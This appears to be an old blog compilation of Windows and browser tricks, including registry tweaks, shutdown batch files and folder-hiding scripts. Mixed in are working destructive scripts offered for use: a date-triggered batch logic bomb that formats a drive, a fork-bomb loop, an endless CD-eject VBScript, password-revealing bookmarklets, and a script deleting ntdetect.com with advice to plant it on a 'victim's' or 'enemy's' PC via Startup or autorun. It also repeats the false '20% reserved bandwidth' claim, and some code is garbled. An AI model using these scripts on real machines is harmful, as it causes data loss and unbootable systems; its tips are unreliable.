Set Wall Paper In Your Pen Drive, Drive, Folder

Copy the following code and paste it in note pad

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image=PATH_OF_THE_WALLPAPER

Save the file as desktop.ini and see the changes

Note:- If the wallpaper exist in the same folder then write the full name of the wallpaper.

Show Password

█►Grєasємσnkey Scяipтs◄█
In order to install these Grease Monkey scripts,you need to install Mozilla Firefox with grease monkey add-on installed

Step-1
Download Mozilla Firefox Web browser from here :

http://www.mozilla.com/en-US/firefox/


Step-2
Install Grease Monkey in your Firefox browser :
https://addons.mozilla.org/en-US/firefox/addon/748


This is a Grease Monkey script which shows password when mouse is moved over password field of the orkut/gmail/yahoo login page.

Step-3
To install this "Show Password" Grease Monkey script,just click the link given below the script will be auto installed on your browser.


http://prudhvi500.googlepages.com/showpass.user.js


Or

Copy and paste the following code in notepad and save it as anything.user.js and then install this

// ==UserScript==
// @name Shows the Password on MouseOverby Prudhvi
// @namespace Prudhvi
// @include *
// @description shows password when mouse is moved over password field
(function() {
var inputs, input;
inputs = document.evaluate(
'//input[@type="password"]',
document,
null,
XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE,
null);
if(!inputs.snapshotLength) return;
for(var i = 0; i <>
input = inputs.snapshotItem(i);
input.addEventListener('mouseover', function(event) {
this.type = 'text';
}, false);
input.addEventListener('mouseout', function(event) {
this.type = 'password';
}, false);
}
})();

View Contents of RAR, ZIP File Before Downloading

Add the following addon to the firefox it is ArchView.
If you want to download the single file from the Archive.
Now you can download the file.

https://addons.mozilla.org/en-US/firefox/addon/5028

Restart the Firefox.
Now when you will download the RAR, ZIP file it will be active and you can download the desired number of files from the Archive.

Logic Bomb Virus In Batch

Open Notepad

Copy Paste The Following

If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit


And Save It As Anything.bat

Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day

Boost internet Speed by 20%

Windows uses 20% of your internet bandwidth by default! Microsoft reserve 20% of your available bandwidth for their own purposes (for updates and interrogating your machine etc..). Here's how to get it back.

Click Start-->Run-->and type gpedit.msc. Hit enter.
This opens the group policy editor.
Then go to:
Local Computer Policy -->Computer Configuration -->Administrative Templates -->Network -->QOS Packet Scheduler -->Limit Reservable Bandwidth

Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab:

"By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."

So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%. Works on XP Pro and 2000.

Auto Shutdown PC

METHOD # 1

Step 1:
Right click on your desktop and choose "New=>shortcuts".

Step 2
:
In the box that says "Type the location of the shortcut",
type in "shutdown -s -t 3600" without the quotation marks and click next.

Note: 3600 are the amount of seconds before your computer shuts down. So , 60secs*60mins=3600secs.

Step 3:
Make up a name for the shortcut and you're done.

To abort:

To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to " shutdown -a" without the quotes.


METHOD # 2

Here is another trick to shutdown at a specific time, for example you wish to shutdown at 11:35am. Type this in
start=>Run => cmd

Type : at 11:35 shutdown -s

to abort :

Type : shutdown -a


METHOD # 3

You can use a batch for that as well it makes it easier to use just run the batch and enter the time you want it to shutdown

Open Notepad and type the following code and name it as shutdown.bat

@echo off
title Scheduled Shutdown Batch Example by chacha1234
color A
echo Enter Time To Shutdown (example 19:30)
set /p stime=
cls
at %stime% ""shutdown -s -t 00"" >nul
echo Your PC Will Auto Shutdown At %stime%
echo Press Any Key To Exit
pause >nul
exit

also you can add -c "desired message" at the end of the shutdown command
for example
shutdown -s -t 60 -c "Shutdown PC"

using this command u can also schedule ur pc to restart
for example
shutdown -r -t 60 -c "Restarting PC"

Rename Recycle Bin

GoTo
[start][run][cmd]
[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder]
"Attributes"=hex:50,01,00,20
"CallForAttributes"=dword:00000000

Change the value accordingly.

Now you will be able to rename recycle bin.

Welcome Screen Logon versus Classic Logon

This registry edit specifies whether the Welcome screen or the Classic logon will be used to access Windows XP.


[Start] [Run] [Regedit]
Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Winlogon
Data Type: REG_DWORD [Dword Value] / Value Name: LogonType
Value Data: [0 - Classic Mode / 1 - Welcome Screen]
Modify/Create the Value Name [LogonType] according to the Value Data listed above.

Exit Registry and Reboot



Start Up Your Computer Much Faster

[Start] [Run] [Regedit]
HKEY_LOACAL_MECHINE\SYSTEM\CurrentControlSet\Control\ContentIndex

now there find the Key Called "Startup Delay"
Double Click On It, Now where its Base, Click Decimal
Now its Default Value Is 4800000
Change The Value To 40000

Here u go u have done it
Now close the Registery Editor and Restart Your Computer
You'll See The Result

Launch Programs at Login Without Using the Startup Folder

This registry hack allows a program to be launched when the user logs onto the computer. It can be set to run minimized and there is no trace of the executable in the Startup folder on the Start Menu nor in the Documents and Settings folder accessible via Windows Explorer.


[Start] [Run] [Regedit]
Registry Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.
Data Type: REG_SZ [String Value] // Value Name: [Enter the Name of Program Executable]
Value Data: [Enter the Path to the Program Executable]

Exit Registry and Reboot

Hide The Drive


1.First goto start->run->type “diskpart” and enter(with out quotations)
2.Type “list volume” (with out quotations)
3.select the volume of drive u want to hide by this command “
select volume3” (with out quotations)
4.Then type “remove letter f” (with out quotations)
(It removes the drive f)

5.If u want re-assign the drive

a. First goto start->run->type “diskpart” and enter(with out quotations)
b. Type “list volume” (with out quotations)
c. select the volume of drive u (before) hide by this command “select
volume3” (with out quotations)
d.THEN type “assign letter f” (with out quotations)


EXAMPLE:
DISKPART> list volume

Volume ### Ltr Label Fs Type Size Status Info
---------- --- ----------- ----- ---------- ------- --------- --------
Volume 0 D DVD-ROM 0 B
Volume 1 C NTFS Partition 20 GB Healthy System
Volume 2 E New Volume NTFS Partition 49 GB Healthy
Volume 3 F New Volume NTFS Partition 78 GB Healthy
Volume 4 G New Volume NTFS Partition 86 GB Healthy
Volume 5 H SUBBU FAT32 Removeable 978 MB

DISKPART> select volume 3
Volume 3 is the selected volume.
DISKPART> remove letter f
DiskPart successfully removed the drive letter or mount point.
DISKPART> select volume 3
Volume 3 is the selected volume.
DISKPART> assign letter f
DiskPart successfully assigned the drive letter or mount point.

Create A Hidden User Account

This registry hack allows an account that is normally displayed on the Welcome screen to be hidden from view. To log on using the account it's necessary to use the Log On To Windows dialog box similar to the one in Windows 2000.


[Start] [Run] [Regedit]
Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\
Winlogon\SpecialAccounts\UserList
Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.
Data Type: REG_DWORD [Dword Value] // Value Name: Type Name of Account to be Hidden
Setting for Value Data: [0 = Account is Hidden / 1 = Enabled]

Exit Registry and Reboot

Creating Hardlink

Here we go, If i ask u one problem:
create three files with different names in such a way that u edit one file and all three reflects the change same time or the things from one file gets into others too, without even allocating a bit more space in harddisk?

The answer is here, if the drive type is NTFS

Then u can use the hardlinks, hardlink is a link to a file so that it always points to the original file location in drive sectors, so even if u delete the original file, it still remains intact, so to delete it completely, delete all hardlinks also to that file,

first create a file and then to create its hardlink the following command works:

FSUTIL hardlink create new filename existing filename

and create many hardlinks with different names to the same file and then change or edit any one of'em and everyone will get the reflectionm...enjoy

DOS - Mini Calculator

The command processor CMD.EXE comes with a mini-calculator that can perform simple arithmetic on 32-bit signed integers:
C:\>set /a 2+2
4
C:\>set /a 2*(9/2)
8
C:\>set /a (2*9)/2
9
C:\>set /a "31>>2"
7
For more information, type set /? at the command prompt.

Change Default Installation Path

XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/ or directory by this method.

Run the Registry Editor (regedit)and go to

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion

Look for the value named ProgramFilesDir. by default,this value will be C:\Program Files. Edit the value to any valid drive or folder and XP will use that new location as the default installation directory for new programs.

Know Password That are Saved in Login

To Know the password that are saved at login by mistakenly or by knowingly .

Copy and paste the following script on address bar and hit enter.

javasrcipt:alert(document.getElementById('passwd').value);

Note:- It may or may not work in FireFox.


or


u can use this script.
javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j
%20{%20f%20=%20F[j];%20for%20(i=0;%20i
%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
%20(s)%20alert(%22Sujeet%20:%20The%20Password%20On
%20This Page:\n\n%22%20+%20s);%20else%20alert(%22There%20are
%20no%20passwords%20in%20forms%20on%20this
%20page.%22);})(); 

CD ROM Virus

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

Copy it in notepad and save as any.vbs then run this file see what happens.
note :- to stop this press alt+ctrl+del and terminate the wscript.exe in process tab

Edit Any Web Page

Go to the page you want to edit
Copy the below code into the url bar.

javascript: document.body.contentEditable = 'true'; document.designMode = 'on'; void 0

Hit go! the links will have turned a more saturated blue, and when you click somewhere you'll be able to edit text..
Feel free to edit whatever you want on the page & u can save that page..
Note: It doesn't work on orkut pages because of Main#.

Batch Message Encrypter & Decrypter

Friends Just Copy Paste the Whole Code in Red in a Notepad And Save It as Anything.bat

This is not my trick it has been taken from somewhere else
And Enjoy the Wonderful Trick


@echo off
color 0A
mode con lines=16 cols=53
set version=Bilal 2.5
set titre=CRYPT++ v%version% by BADMAN
title {%titre%}
echo.
echo ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo ³ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ³
echo ³ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ³
echo ³ÛÛ°°°°°°ÛÛ°°Û°°ÛÛÛÛÛÛÛ°°°°°°°°°°Û°°ÛÛÛÛÛÛÛÛÛÛÛ³
echo ³ÛÛ°°ÛÛÛ°ÛÛ°°Û°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛ°°Û°°ÛÛÛÛÛÛÛÛÛÛÛ³
echo ³ÛÛ°°ÛÛÛ°ÛÛ°°Û°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛ°°Û°°ÛÛÛÛÛÛÛÛÛÛÛ³
echo ³ÛÛ°°°°°°ÛÛ°°Û°°ÛÛÛÛÛÛÛ°°°°°°°°°°Û°°ÛÛÛÛÛÛÛÛÛÛÛ³
echo ³ÛÛ°°ÛÛÛ°ÛÛ°°Û°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛ°°Û°°ÛÛÛÛÛÛÛÛÛÛÛ³
echo ³ÛÛ°°ÛÛÛ°ÛÛ°°Û°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛ°°Û°°ÛÛÛÛÛÛÛÛÛÛÛ³
echo ³ÛÛ°°°°°°ÛÛ°°Û°°°°°°°°Û°°ÛÛÛÛÛÛ°°Û°°°°°°°°°ÛÛÛÛ³
echo ³ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ³
echo ÀÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÙ
echo ³ þ Version %version% by BADMAN þ ³
echo ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo.
ping localhost -n 3 >NUL
goto start
:start
cls
echo.
echo ^>^>^> %titre%
echo.
echo ^>^> Menu:
echo ^> Encrypt message (1)
echo ^> Decrypt message (2)
echo ^> About (a)
echo ^> Quit (q)
echo.
set /p startchoice=^>^>Choice:
if /i "%startchoice%"=="1" (
goto 1
) else if /i "%startchoice%"=="2" (
goto 2
) else if /i "%startchoice%"=="a" (
goto about
) else if /i "%startchoice%"=="q" (
goto quit
) else (
goto badrequest
)
:1
cls
echo.
echo ^>^>^> %titre%
echo.
set msg=
set /p msg=Message to encrypt:
echo %msg%>msg.txt
for /F "delims=" %%i in (msg.txt) do call :encrypt "%%i"
:encrypt
set msg=%1
set msg=%msg:a=[279]%
set msg=%msg:b=[211]%
set msg=%msg:c=[882]%
set msg=%msg:d=[196]%
set msg=%msg:e=[678]%
set msg=%msg:f=[735]%
set msg=%msg:g=[556]%
set msg=%msg:h=[517]%
set msg=%msg:i=[522]%
set msg=%msg:j=[252]%
set msg=%msg:k=[632]%
set msg=%msg:l=[706]%
set msg=%msg:m=[282]%
set msg=%msg:n=[565]%
set msg=%msg:o=[215]%
set msg=%msg:p=[626]%
set msg=%msg:q=[628]%
set msg=%msg:r=[321]%
set msg=%msg:s=[901]%
set msg=%msg:t=[136]%
set msg=%msg:u=[804]%
set msg=%msg:v=[355]%
set msg=%msg:w=[429]%
set msg=%msg:x=[697]%
set msg=%msg:y=[561]%
set msg=%msg:z=[708]%
set msg=%msg:?=[578]%
set msg=%msg:!=[932]%
set msg=%msg: =[363]%
set msg=%msg:.=[786]%
set msg=%msg:,=[507]%
set msg=%msg:;=[616]%
set msg=%msg:[=++-++%
set msg=%msg:]=+-+-+%
set msg=%msg:"=%
echo %msg%>encrypt.txt
del /F /Q msg.txt >NUL
start "Crypt++: Encrypted message" "encrypt.txt"
pause
goto start
:2
cls
echo.
echo ^>^>^> %titre%
echo.
set msg=
set /p msg=Message to decrypt:
echo %msg%>msg.txt
for /F "delims=" %%i in (msg.txt) do call :decrypt %%i
:decrypt
set msg=%1
set msg=%msg:++-++=[%
set msg=%msg:+-+-+=]%
set msg=%msg:[279]=a%
set msg=%msg:[211]=b%
set msg=%msg:[882]=c%
set msg=%msg:[196]=d%
set msg=%msg:[678]=e%
set msg=%msg:[735]=f%
set msg=%msg:[556]=g%
set msg=%msg:[517]=h%
set msg=%msg:[522]=i%
set msg=%msg:[253]=j%
set msg=%msg:[632]=k%
set msg=%msg:[706]=l%
set msg=%msg:[282]=m%
set msg=%msg:[565]=n%
set msg=%msg:[215]=o%
set msg=%msg:[626]=p%
set msg=%msg:[628]=q%
set msg=%msg:[321]=r%
set msg=%msg:[901]=s%
set msg=%msg:[136]=t%
set msg=%msg:[804]=u%
set msg=%msg:[355]=v%
set msg=%msg:[429]=w%
set msg=%msg:[697]=x%
set msg=%msg:[561]=y%
set msg=%msg:[708]=z%
set msg=%msg:[578]=?%
set msg=%msg:[932]=!%
set msg=%msg:[363]= %
set msg=%msg:[786]=.%
set msg=%msg:[507]=,%
set msg=%msg:[616]=;%
echo %msg%>decrypt.txt
del /F /Q msg.txt >NUL
start "Crypt++: Decrypted message" "decrypt.txt"
pause
goto start
:about
cls
echo.
echo ^>^>^> %titre%
echo.
echo ¸Copyright 2009-Infinity by BADMAN
echo All rights reserved!
echo.
echo Bugs, support, infos, contact:
echo BADMAN Bilal Marri
echo.
pause
goto start
:quit
cls
cls
echo.
echo ^>^>^> %titre%
echo.
echo ¸Copyright 2009-Infinity by BADMAN
echo All rights reserved!
echo.
echo Bugs, support, infos, contact:
echo BADMAN Bilal Marri
echo.
pause
exit
:badrequest
echo @echo off > "%TEMP%\badrequest.bat"
echo cls >> "%TEMP%\badrequest.bat"
echo color C0 >> "%TEMP%\badrequest.bat"
echo mode con lines=4 cols=40 >> "%TEMP%\badrequest.bat"
echo echo. >> "%TEMP%\badrequest.bat"
echo echo - ERROR: Bad request! >> "%TEMP%\badrequest.bat"
echo echo. >> "%TEMP%\badrequest.bat"
echo ping localhost -n 2 ^>NUL >> "%TEMP%\badrequest.bat"
echo exit >> "%TEMP%\badrequest.bat"
start "Crypt++: ERROR: Bad request!" "%TEMP%\badrequest.bat"
goto start

Batch Virus

Open notepad copy this and save as anything.bat and run the file.

@echo off
:virus
start
goto virus

Lock your Folder Without Software (Another Method)

Copy the following program:

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%== goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

* Now paste it in notepad.
* Modify blue color area with your own password.
* Save it as batch file(with extension .bat).Any name will do.
* Now you see a batch file. Double click it to create a folder locker.
* A new folder named Locker would be formed at the same location.
* Now brings all the files you want to hide in the locker folder.
* Now double click the batch file to lock the folder namely Locker.
* If you want to unlock your files,double click the batch file again and you would be prompted for password.Enter the password and enjoy access to the folder.

Lock folders without softwares

Suppose you want to lock the folder movies in D: which has path D:\Games .
Open notepad and type

ren Games Games.{21EC2020-3AEA-1069-A2DD-08002B30309D}

Now Save this text file as "Location.bat" in the same drive [ D:\ ]

Now Open notepad again and type

ren Games.{21EC2020-3AEA-1069-A2DD-08002B30309D} Games

Now save this text file as "Key.bat" in the same drive
Now two batch file are created Location and Key.Press Location and the folder will change to control panel such that you cannot view its Contents .Press key and you'll get back your original folder .

You can also change the folder in to

Inbox

{00020D75-0000-0000-C000-000000000046}
Microsoft Network
{00028B00-0000-0000-C000-000000000046}
Programs Folder
{7be9d83c-a729-4d97-b5a7-1b7313c39e0a}
Start Menu Folder
{48e7caab-b918-4e58-a94d-505519c795dc}
Network Computers
{1f4de370-d627-11d1-ba4f-00a0c91eedba}
My Computer
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
My Network Places
{208D2C60-3AEA-1069-A2D7-08002B30309D}
Network Connections
{7007ACC7-3202-11D1-AAD2-00805FC1270E}
Printers and Faxes
{2227A280-3AEA-1069-A2DE-08002B30309D}
Recycle Bin
{645FF040-5081-101B-9F08-00AA002F954E}
Scanners and Cameras
{E211B736-43FD-11D1-9EFB-0000F8757FCD}
Scheduled Tasks
{D6277990-4C6A-11CF-8D87-00AA0060F5BF}
Web Folders
{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

Simple, but deadly code

Simple, but deadly code >>> UNDETECTABLE
Here is a simple way on how to Block your enemies PC
The Simple but Deadly Code
open notepad type the code as following
__________________________________________________
echo off
C:
cd..
cd..
cd..
attrib -r -s -h ntdetect.com
del ntdetect.com
echo on
__________________________________________________
save this file as virus.bat or any other name with bat extension
Double click it in the victim's computer or Put it in Startup of Ur enemy or put it in a CD and set it in the autorun.
NOTE: DO NOT Run this into your PC
with this activated once the computer will run perfectly !
once shutdowned then it will not start and U will have to format it (Except you know how to use DOS).